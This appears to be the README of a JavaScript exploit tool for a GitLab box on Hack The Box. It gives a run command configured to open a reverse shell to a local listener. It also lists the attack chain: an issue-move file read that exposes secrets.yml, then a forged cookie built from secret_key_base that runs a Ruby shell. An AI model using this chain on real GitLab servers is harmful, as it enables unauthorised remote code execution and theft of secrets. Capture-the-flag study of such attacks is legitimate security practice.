Based entirely on https://github.com/dotPY-hax/gitlab_RCE, which did not work for me and the HTML parsing stuff seemed cumbersome so I rewrote it in js.
Start a reverse shell handler in the usual way, then run this script with:
TARGET_URI="https://target" TARGET_EMAIL_DOMAIN="laboratory.htb" \
TARGET_USER="test" TARGET_PASSWORD="Test pass 123" \
LOCAL_IP="10.10.14.142" LOCAL_PORT="44044" \
node gitlab_rce.js
A proxy may be specified with TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080"
.
Burp is particularly useful for debugging with this.
- checks if target is up
- if the provided user exists, skip to 5
- scan for a username that doesn't already exist
- create that user
- attempt sign in
- create two empty projects
- create an new issue ticket with a malicious link in it's body in the first project
- move the new ticket to the other project, causing GitLab to rewrite our malicious link and copy the file it points to into the uploads dir
- fetches the target file, in this case we want the secrets.yml for the secret_key_base
- use secret_key_base to mint an evil cookie with our Ruby shell and pass it to GitLab